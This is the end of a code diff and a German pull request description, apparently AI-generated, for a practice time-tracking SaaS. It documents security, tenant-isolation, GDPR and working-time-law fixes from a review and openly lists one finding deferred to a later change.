+| Einwilligungs-Nachweis | Zustimmung AGB/Datenschutz (Bool + Zeitpunkt) | Art. 7 Abs. 1 DSGVO (Nachweis der Einwilligung) | Nein |
+
+Gespeichert in `signup_audit_logs`. IP-Adresse gilt nach Art. 4 Nr. 1 DSGVO als personenbezogenes Datum. Diese Daten werden bei der Tenant-Anonymisierung/-Löschung (`anonymize_tenant`) entfernt.
+
 ---
 
 ## 5. Aufbewahrungsfristen und Löschkonzept
@@ -92,6 +103,7 @@
 | Stammdaten (aktiver MA) | Für Dauer des Beschäftigungsverhältnisses | §26 BDSG | Deaktivierung bei Austritt |
 | Stammdaten (inaktiver MA) | Bis Ablauf aller Aufbewahrungsfristen | §16 ArbZG / §147 AO | Anonymisierung + Purge |
 | Passwort-Hashes | Bis Kontoschließung / Anonymisierung | Art. 6 Abs. 1 lit. b DSGVO | Überschreiben bei Anonymisierung |
+| Signup-/Einwilligungs-Nachweis (nur SaaS) | 3 Jahre | Art. 7 Abs. 1 DSGVO (Nachweispflicht) / Verjährung | Scrubbing in `anonymize_tenant`, Löschung nach Fristablauf |
 
 ### Löschprozess (Implementierung in PraxisZeit)
 

--- a/frontend/nginx.conf
+++ b/frontend/nginx.conf
@@ -109,6 +109,9 @@ server {
     add_header X-Content-Type-Options "nosniff" always;
     # X-XSS-Protection removed: deprecated in modern browsers and superseded by CSP
     add_header Referrer-Policy "strict-origin-when-cross-origin" always;
+    # M-SEC3: style-src keeps 'unsafe-inline' deliberately (React dynamic inline
+    # styles + inline <style> keyframes). script-src stays 'self'. Keep this
+    # policy byte-identical to SecurityHeadersMiddleware in static_serving.py.
     add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; frame-ancestors 'self'; base-uri 'self'; form-action 'self';" always;
     # HSTS: tell browsers to always use HTTPS (max-age=1 year); effective when served via TLS terminator
     add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;


### PR DESCRIPTION
## Kontext

Intensiv-Review (API · Security · DSGVO · ArbZG) vom 2026-05-29. Dieser PR behebt **alle HIGH- und MEDIUM-Befunde**. LOW-Findings und **H3** (`app.is_superadmin`-GUC) sind bewusst ausgeklammert — siehe unten.

**Verifikation:** TDD durchgängig (RED→GREEN). SQLite-Suite **789 passed / 0 failed / 44 skipped**; Postgres-Gruppe (RLS + Concurrency) **21 passed**. Migration 044 upgrade/downgrade-Roundtrip gegen echtes Postgres geprüft.

## HIGH

| # | Fix | Dateien |
|---|-----|---------|
| H1 | **§16-Notfall-Export 500 auf Postgres** — `time_entry_audit_logs.action` von `varchar(20)` → `varchar(40)` (Migration 044); `arbzg_superadmin_export` (23) + `license_readonly_mode_entered` (29) sprengten das Limit. Audit-Commit im Export defensiv gekapselt. | `models/time_entry_audit_log.py`, `routers/superadmin.py`, Migration 044 |
| H2 | **Rate-Limit-Spoofing (Native-Modus)** — `X-Real-IP`/`X-Forwarded-For` nur hinter vertrauenswürdigem Proxy berücksichtigt (`settings.trust_proxy_headers`, Auto-Default aus `SERVE_FRONTEND`); direkt exponiert → Socket-Peer. | `core/limiter.py`, `config.py` |

## MEDIUM — API / Tenant-Scoping (F-026)
- Explizite `tenant_id`-Filter: `list_audit_log`, `list_all_vacation_requests` (+ VR-Enrichment), `PublicHoliday`-Queries (`admin_vacations` Review, `journal_service`), `create_user`-Username-Uniqueness (jetzt korrekt pro Tenant eindeutig).
- **SaaS-Signup-Enumeration**: doppelte E-Mail → identische `201`-Antwort statt `409` + Out-of-Band-"Konto existiert"-Mail, kein neuer Tenant.

## MEDIUM — Security
- **Formel-/CSV-Injektion** in XLSX/ODS-Export neutralisiert (`= + - @ Tab CR` → `'`-Prefix; gemeinsamer Choke-Point).
- **`SecurityHeadersMiddleware` bedingungslos** angehängt (CSP/Anti-Clickjacking auch hinter nginx/Proxy garantiert). `style-src 'unsafe-inline'` **bewusst beibehalten + dokumentiert** (React-Inline-Styles + Keyframe-`<style>`-Blöcke); Entfernen würde das UI brechen. `script-src` bleibt `'self'`.
- **TOTP-Aktivierung** nutzt `verify_totp_with_counter` + persistiert `last_totp_counter` → Aktivierungscode nicht gegen Login wiederverwendbar.

## MEDIUM — ArbZG
- **§4 Break-Waiver** jetzt auch im **clock-out**-Pfad (`ClockOutRequest.break_waiver_reason`) und im **Admin-Direkteintrag** (create/update) — Dokumentation + Audit (`source='break_waiver'`) statt Hard-Block. §3-10h-Hard-Cap bleibt vorrangig (nicht waivebar).
- **§3 `/24-week-average`**: `scheduled_work_days` pro tatsächlichem Arbeitstag (Wochentagsschema + `WorkingHoursChange`-Historie, abzüglich Feiertage/Abwesenheiten) statt statisch `24×work_days_per_week`.
- Falsche Kommentare **§14 → §3** (48h-Wochengrenze) korrigiert.

## MEDIUM — DSGVO
- **Slack-Signup-Alert** ohne Admin-E-Mail (Slack = nicht offengelegter Sub-Prozessor) — nur Praxisname.
- **`error_logs.path`** scrubbt UUIDs vor dem Speichern (`_scrub_path`; ungenutzte `_NAME_IN_PATH_RE` ersetzt).
- **Verarbeitungsverzeichnis** um Signup-/Einwilligungs-Nachweisdaten (IP/User-Agent, nur SaaS) + Aufbewahrungsfrist ergänzt (Art. 30).

## Bewusst NICHT in diesem PR
- **H3 — `app.is_superadmin`-GUC selbst-setzbar durch App-Rolle**: Sauberer Fix erfordert eine separate `BYPASSRLS`-Rolle/Engine → ändert das DB-Rollen-Setup und kollidiert mit der Projektregel „bestehende DB-User nicht ändern / gegen Prod-DB-Kopie testen". Heute **nicht ausnutzbar** (kein SQLi; F-026-Filter sind der Backstop). Braucht eine separate Design-Entscheidung.
- **Alle LOW-Findings** (kosmetisch/Defense-in-Depth/Doku).

## Hinweise zum Deploy
- **Migration 044** ist eine nicht-destruktive Spaltenverbreiterung (kein Datenverlust, keine User-Änderung) — gemäß Projektregel vor dem Prod-Deploy gegen eine Prod-DB-Kopie testen.
- `action`-Spalte ist jetzt wie `source` `varchar(40)` — neue Audit-Marker müssen < 40 Zeichen bleiben.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
